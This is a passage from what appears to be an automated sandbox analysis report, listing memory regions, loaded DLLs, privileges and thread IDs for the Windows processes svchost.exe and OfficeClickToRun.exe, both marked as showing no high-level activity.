- |
| winspool.drv | 0x7ffae1820000 | 0x7ffae18a3fff | Memory Mapped File | rwx |
|
|
|
- |
| wsnmp32.dll | 0x7ffae5a00000 | 0x7ffae5a13fff | Memory Mapped File | rwx |
|
|
|
- |
| msxml6.dll | 0x7ffaea5e0000 | 0x7ffaea856fff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7ffaea9d0000 | 0x7ffaea9e1fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x7ffaebb50000 | 0x7ffaebb5bfff | Memory Mapped File | rwx |
|
|
|
- |
| rasadhlp.dll | 0x7ffaec410000 | 0x7ffaec419fff | Memory Mapped File | rwx |
|
|
|
- |
| winprint.dll | 0x7ffaecb30000 | 0x7ffaecb3ffff | Memory Mapped File | rwx |
|
|
|
- |
| fxsmon.dll | 0x7ffaeceb0000 | 0x7ffaecec0fff | Memory Mapped File | rwx |
|
|
|
- |
| spoolss.dll | 0x7ffaecf20000 | 0x7ffaecf3bfff | Memory Mapped File | rwx |
|
|
|
- |
| deviceassociation.dll | 0x7ffaecf70000 | 0x7ffaecf7ffff | Memory Mapped File | rwx |
|
|
|
- |
| sfc_os.dll | 0x7ffaecf80000 | 0x7ffaecf90fff | Memory Mapped File | rwx |
|
|
|
- |
| snmpapi.dll | 0x7ffaed030000 | 0x7ffaed03bfff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x7ffaef620000 | 0x7ffaef6f5fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ffaef9c0000 | 0x7ffaef9f5fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpuclnt.dll | 0x7ffaf0920000 | 0x7ffaf0987fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7ffaf1700000 | 0x7ffaf171dfff | Memory Mapped File | rwx |
|
|
|
- |
| printisolationproxy.dll | 0x7ffaf1920000 | 0x7ffaf1933fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x7ffaf1940000 | 0x7ffaf194afff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x7ffaf1960000 | 0x7ffaf1997fff | Memory Mapped File | rwx |
|
|
|
- |
| dsrole.dll | 0x7ffaf1b60000 | 0x7ffaf1b69fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x7ffaf2a00000 | 0x7ffaf2a12fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffaf2db0000 | 0x7ffaf2dd6fff | Memory Mapped File | rwx |
|
|
|
- |
| fwbase.dll | 0x7ffaf3170000 | 0x7ffaf31a1fff | Memory Mapped File | rwx |
|
|
|
- |
| firewallapi.dll | 0x7ffaf31b0000 | 0x7ffaf3231fff | Memory Mapped File | rwx |
|
|
|
- |
| gpapi.dll | 0x7ffaf3360000 | 0x7ffaf3382fff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x7ffaf35e0000 | 0x7ffaf3637fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ffaf36f0000 | 0x7ffaf36fbfff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7ffaf3700000 | 0x7ffaf3725fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffaf3a50000 | 0x7ffaf3a6efff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x7ffaf3ab0000 | 0x7ffaf3b57fff | Memory Mapped File | rwx |
|
|
|
- |
| mswsock.dll | 0x7ffaf3ca0000 | 0x7ffaf3cfcfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffaf41b0000 | 0x7ffaf41dbfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffaf44b0000 | 0x7ffaf44c0fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x7ffaf44e0000 | 0x7ffaf4533fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffaf4540000 | 0x7ffaf4583fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffaf4c80000 | 0x7ffaf4e40fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffaf55b0000 | 0x7ffaf56f0fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ffaf7560000 | 0x7ffaf75c8fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ffaf7680000 | 0x7ffaf7687fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7ffaf7690000 | 0x7ffaf7854fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffaf7860000 | 0x7ffaf78b0fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #50: svchost.exe
0
0
| Information | Value |
|---|---|
| ID | #50 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x44c |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Local Service |
| Enabled Privileges | SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
268
0x
73C
0x
714
0x
710
0x
6B0
0x
680
0x
674
0x
5F8
0x
58C
0x
588
0x
558
0x
530
0x
500
0x
4E4
0x
4D8
0x
4C4
0x
4BC
0x
4B8
0x
4AC
0x
4A8
0x
4A0
0x
498
0x
494
0x
490
0x
484
0x
450
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x0000002c1a6a0000 | 0x2c1a6a0000 | 0x2c1a6affff | Pagefile Backed Memory | rw |
|
|
|
- |
| svchost.exe.mui | 0x2c1a6b0000 | 0x2c1a6b0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000002c1a6c0000 | 0x2c1a6c0000 | 0x2c1a6d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002c1a6e0000 | 0x2c1a6e0000 | 0x2c1a75ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002c1a760000 | 0x2c1a760000 | 0x2c1a763fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000002c1a770000 | 0x2c1a770000 | 0x2c1a770fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002c1a780000 | 0x2c1a780000 | 0x2c1a781fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x2c1a790000 | 0x2c1a84dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000002c1a850000 | 0x2c1a850000 | 0x2c1a850fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1a860000 | 0x2c1a860000 | 0x2c1a860fff | Private Memory | rw |
|
|
|
- |
| bfe.dll.mui | 0x2c1a870000 | 0x2c1a876fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000002c1a880000 | 0x2c1a880000 | 0x2c1a88ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1a890000 | 0x2c1a890000 | 0x2c1a890fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1a8a0000 | 0x2c1a8a0000 | 0x2c1a8a6fff | Private Memory | rw |
|
|
|
- |
| firewallapi.dll.mui | 0x2c1a8b0000 | 0x2c1a8d3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000002c1a8e0000 | 0x2c1a8e0000 | 0x2c1a8e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000002c1a8f0000 | 0x2c1a8f0000 | 0x2c1a8f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002c1a900000 | 0x2c1a900000 | 0x2c1a9fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1aa00000 | 0x2c1aa00000 | 0x2c1aa7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002c1aa80000 | 0x2c1aa80000 | 0x2c1ac07fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002c1ac10000 | 0x2c1ac10000 | 0x2c1ac17fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1ac20000 | 0x2c1ac20000 | 0x2c1ac20fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1ac30000 | 0x2c1ac30000 | 0x2c1ac36fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002c1ac40000 | 0x2c1ac40000 | 0x2c1acfffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002c1ad00000 | 0x2c1ad00000 | 0x2c1adfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002c1ae00000 | 0x2c1ae00000 | 0x2c1af80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002c1af90000 | 0x2c1af90000 | 0x2c1b08ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1b090000 | 0x2c1b090000 | 0x2c1b18ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000002c1b190000 | 0x2c1b190000 | 0x2c1b191fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000002c1b200000 | 0x2c1b200000 | 0x2c1b206fff | Private Memory | rw |
|
|
|
- |
| firewallapi.dll | 0x2c1b210000 | 0x2c1b28cfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000002c1b300000 | 0x2c1b300000 | 0x2c1b3fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1b500000 | 0x2c1b500000 | 0x2c1b5fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1b600000 | 0x2c1b600000 | 0x2c1b6fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1b700000 | 0x2c1b700000 | 0x2c1b7fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1b800000 | 0x2c1b800000 | 0x2c1b8fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1b900000 | 0x2c1b900000 | 0x2c1b9fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1bb00000 | 0x2c1bb00000 | 0x2c1bbfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1bc00000 | 0x2c1bc00000 | 0x2c1bc7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1bc80000 | 0x2c1bc80000 | 0x2c1bd7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1bd80000 | 0x2c1bd80000 | 0x2c1be7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1be80000 | 0x2c1be80000 | 0x2c1bf7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1bf80000 | 0x2c1bf80000 | 0x2c1c07ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1c080000 | 0x2c1c080000 | 0x2c1c87ffff | Private Memory | - |
|
|
|
- |
| private_0x0000002c1c880000 | 0x2c1c880000 | 0x2c1c97ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1ca00000 | 0x2c1ca00000 | 0x2c1cafffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1cb00000 | 0x2c1cb00000 | 0x2c1cbfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1cc00000 | 0x2c1cc00000 | 0x2c1ccfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1cd00000 | 0x2c1cd00000 | 0x2c1cdfffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x2c1ce00000 | 0x2c1d136fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000002c1d200000 | 0x2c1d200000 | 0x2c1d2fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1d300000 | 0x2c1d300000 | 0x2c1d3fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1d400000 | 0x2c1d400000 | 0x2c1d4fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1d500000 | 0x2c1d500000 | 0x2c1d5fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1d600000 | 0x2c1d600000 | 0x2c1d6fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1d700000 | 0x2c1d700000 | 0x2c1d7fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1d900000 | 0x2c1d900000 | 0x2c1d9fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1da80000 | 0x2c1da80000 | 0x2c1da86fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1da90000 | 0x2c1da90000 | 0x2c1da96fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1db00000 | 0x2c1db00000 | 0x2c1dbfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1dc00000 | 0x2c1dc00000 | 0x2c1dcfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1dd00000 | 0x2c1dd00000 | 0x2c1ddfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1de00000 | 0x2c1de00000 | 0x2c1e000fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1e010000 | 0x2c1e010000 | 0x2c1e10ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1e200000 | 0x2c1e200000 | 0x2c1e2fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1e300000 | 0x2c1e300000 | 0x2c1e3fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1e400000 | 0x2c1e400000 | 0x2c1e4fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1e500000 | 0x2c1e500000 | 0x2c1e5fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1e600000 | 0x2c1e600000 | 0x2c1e6fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1ea00000 | 0x2c1ea00000 | 0x2c1eafffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1eb00000 | 0x2c1eb00000 | 0x2c1ebfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1eed0000 | 0x2c1eed0000 | 0x2c1f151fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c1fde0000 | 0x2c1fde0000 | 0x2c2075ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c20760000 | 0x2c20760000 | 0x2c2fe55fff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c3f300000 | 0x2c3f300000 | 0x2c3f3fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c3f400000 | 0x2c3f400000 | 0x2c3f4fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c3f500000 | 0x2c3f500000 | 0x2c3f5fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c3f600000 | 0x2c3f600000 | 0x2c3f6fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c3f700000 | 0x2c3f700000 | 0x2c3f7fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c3fb00000 | 0x2c3fb00000 | 0x2c3fbfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c3fc00000 | 0x2c3fc00000 | 0x2c3fcfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000002c3fd00000 | 0x2c3fd00000 | 0x2cbb4a3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff600000 | 0x7df5ff600000 | 0x7ff5ff5fffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff787bde000 | 0x7ff787bde000 | 0x7ff787bdffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787be0000 | 0x7ff787be0000 | 0x7ff787be1fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787be2000 | 0x7ff787be2000 | 0x7ff787be3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787be6000 | 0x7ff787be6000 | 0x7ff787be7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787bea000 | 0x7ff787bea000 | 0x7ff787bebfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787bec000 | 0x7ff787bec000 | 0x7ff787bedfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787bee000 | 0x7ff787bee000 | 0x7ff787beffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787bf0000 | 0x7ff787bf0000 | 0x7ff787bf1fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787bf2000 | 0x7ff787bf2000 | 0x7ff787bf3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787bf4000 | 0x7ff787bf4000 | 0x7ff787bf5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787bf6000 | 0x7ff787bf6000 | 0x7ff787bf7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787bf8000 | 0x7ff787bf8000 | 0x7ff787bf9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787bfa000 | 0x7ff787bfa000 | 0x7ff787bfbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787bfc000 | 0x7ff787bfc000 | 0x7ff787bfdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787bfe000 | 0x7ff787bfe000 | 0x7ff787bfffff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787c00000 | 0x7ff787c00000 | 0x7ff787c01fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787c02000 | 0x7ff787c02000 | 0x7ff787c03fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787c06000 | 0x7ff787c06000 | 0x7ff787c07fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787c08000 | 0x7ff787c08000 | 0x7ff787c09fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787c0a000 | 0x7ff787c0a000 | 0x7ff787c0bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787c0c000 | 0x7ff787c0c000 | 0x7ff787c0dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787c0e000 | 0x7ff787c0e000 | 0x7ff787c0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff787c10000 | 0x7ff787c10000 | 0x7ff787d0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff787d10000 | 0x7ff787d10000 | 0x7ff787d32fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff787d34000 | 0x7ff787d34000 | 0x7ff787d34fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d38000 | 0x7ff787d38000 | 0x7ff787d39fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d3a000 | 0x7ff787d3a000 | 0x7ff787d3bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d3c000 | 0x7ff787d3c000 | 0x7ff787d3dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff787d3e000 | 0x7ff787d3e000 | 0x7ff787d3ffff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff787ec0000 | 0x7ff787eccfff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ffae8b60000 | 0x7ffae8fc9fff | Memory Mapped File | rwx |
|
|
|
- |
| srumapi.dll | 0x7ffaea120000 | 0x7ffaea132fff | Memory Mapped File | rwx |
|
|
|
- |
| energyprov.dll | 0x7ffaea140000 | 0x7ffaea152fff | Memory Mapped File | rwx |
|
|
|
- |
| ncuprov.dll | 0x7ffaea960000 | 0x7ffaea96cfff | Memory Mapped File | rwx |
|
|
|
- |
| wpnsruprov.dll | 0x7ffaea970000 | 0x7ffaea97dfff | Memory Mapped File | rwx |
|
|
|
- |
| radardt.dll | 0x7ffaeaf30000 | 0x7ffaeaf4cfff | Memory Mapped File | rwx |
|
|
|
- |
| appsruprov.dll | 0x7ffaeaf50000 | 0x7ffaeaf66fff | Memory Mapped File | rwx |
|
|
|
- |
| eeprov.dll | 0x7ffaeaf70000 | 0x7ffaeaf8afff | Memory Mapped File | rwx |
|
|
|
- |
| nduprov.dll | 0x7ffaeaf90000 | 0x7ffaeafa4fff | Memory Mapped File | rwx |
|
|
|
- |
| esent.dll | 0x7ffaeb090000 | 0x7ffaeb371fff | Memory Mapped File | rwx |
|
|
|
- |
| pnpts.dll | 0x7ffaeb380000 | 0x7ffaeb388fff | Memory Mapped File | rwx |
|
|
|
- |
| diagperf.dll | 0x7ffaeb390000 | 0x7ffaeb4f5fff | Memory Mapped File | rwx |
|
|
|
- |
| npmproxy.dll | 0x7ffaeb520000 | 0x7ffaeb52dfff | Memory Mapped File | rwx |
|
|
|
- |
| srumsvc.dll | 0x7ffaeb600000 | 0x7ffaeb637fff | Memory Mapped File | rwx |
|
|
|
- |
| wlanapi.dll | 0x7ffaeb690000 | 0x7ffaeb6eefff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffaeb6f0000 | 0x7ffaeb6f9fff | Memory Mapped File | rwx |
|
|
|
- |
| netprofm.dll | 0x7ffaec140000 | 0x7ffaec17efff | Memory Mapped File | rwx |
|
|
|
- |
| wfapigp.dll | 0x7ffaec400000 | 0x7ffaec40bfff | Memory Mapped File | rwx |
|
|
|
- |
| wship6.dll | 0x7ffaec7b0000 | 0x7ffaec7b7fff | Memory Mapped File | rwx |
|
|
|
- |
| wshtcpip.dll | 0x7ffaec7c0000 | 0x7ffaec7c7fff | Memory Mapped File | rwx |
|
|
|
- |
| wshqos.dll | 0x7ffaec7d0000 | 0x7ffaec7d9fff | Memory Mapped File | rwx |
|
|
|
- |
| wdi.dll | 0x7ffaecef0000 | 0x7ffaecf0cfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7ffaedb10000 | 0x7ffaede85fff | Memory Mapped File | rwx |
|
|
|
- |
| mrmcorer.dll | 0x7ffaeef30000 | 0x7ffaef03efff | Memory Mapped File | rwx |
|
|
|
- |
| dps.dll | 0x7ffaef700000 | 0x7ffaef72efff | Memory Mapped File | rwx |
|
|
|
- |
| adhapi.dll | 0x7ffaef7a0000 | 0x7ffaef7a9fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp110_win.dll | 0x7ffaef7b0000 | 0x7ffaef841fff | Memory Mapped File | rwx |
|
|
|
- |
| policymanager.dll | 0x7ffaef850000 | 0x7ffaef888fff | Memory Mapped File | rwx |
|
|
|
- |
| httpprxc.dll | 0x7ffaef890000 | 0x7ffaef898fff | Memory Mapped File | rwx |
|
|
|
- |
| fwpolicyiomgr.dll | 0x7ffaef8a0000 | 0x7ffaef8d4fff | Memory Mapped File | rwx |
|
|
|
- |
| mpssvc.dll | 0x7ffaef8e0000 | 0x7ffaef9b9fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ffaef9c0000 | 0x7ffaef9f5fff | Memory Mapped File | rwx |
|
|
|
- |
| bfe.dll | 0x7ffaefa00000 | 0x7ffaefac9fff | Memory Mapped File | rwx |
|
|
|
- |
| ucrtbase.dll | 0x7ffaf02c0000 | 0x7ffaf03b1fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp_win.dll | 0x7ffaf03c0000 | 0x7ffaf045afff | Memory Mapped File | rwx |
|
|
|
- |
| dhcpcsvc.dll | 0x7ffaf07f0000 | 0x7ffaf0809fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 43 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #51: officeclicktorun.exe
0
0
| Information | Value |
|---|---|
| ID | #51 |
| File Name | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe |
| Command Line | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4d0 |
| Parent PID | 0x1e4 (c:\windows\system32\services.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
7A0
0x
784
0x
780
0x
770
0x
764
0x
750
0x
718
0x
6CC
0x
6AC
0x
664
0x
640
0x
634
0x
62C
0x
61C
0x
5BC
0x
4D4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000061d040000 | 0x61d040000 | 0x61d04ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x000000061d050000 | 0x61d050000 | 0x61d056fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000061d060000 | 0x61d060000 | 0x61d073fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000061d080000 | 0x61d080000 | 0x61d17ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000061d180000 | 0x61d180000 | 0x61d183fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000061d190000 | 0x61d190000 | 0x61d192fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000061d1a0000 | 0x61d1a0000 | 0x61d1a1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x61d1b0000 | 0x61d26dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000061d270000 | 0x61d270000 | 0x61d276fff | Private Memory | rw |
|
|
|
- |
| private_0x000000061d280000 | 0x61d280000 | 0x61d280fff | Private Memory | rw |
|
|
|
- |
| private_0x000000061d290000 | 0x61d290000 | 0x61d290fff | Private Memory | rw |
|
|
|
- |
| private_0x000000061d2a0000 | 0x61d2a0000 | 0x61d2a0fff | Private Memory | rw |
|
|
|
- |
| private_0x000000061d2b0000 | 0x61d2b0000 | 0x61d2b0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000061d2c0000 | 0x61d2c0000 | 0x61d2c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000061d2d0000 | 0x61d2d0000 | 0x61d2d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x000000061d2e0000 | 0x61d2e0000 | 0x61d2e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000061d2f0000 | 0x61d2f0000 | 0x61d2fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000061d300000 | 0x61d300000 | 0x61d300fff | Pagefile Backed Memory | rw |
|
|
|
- |
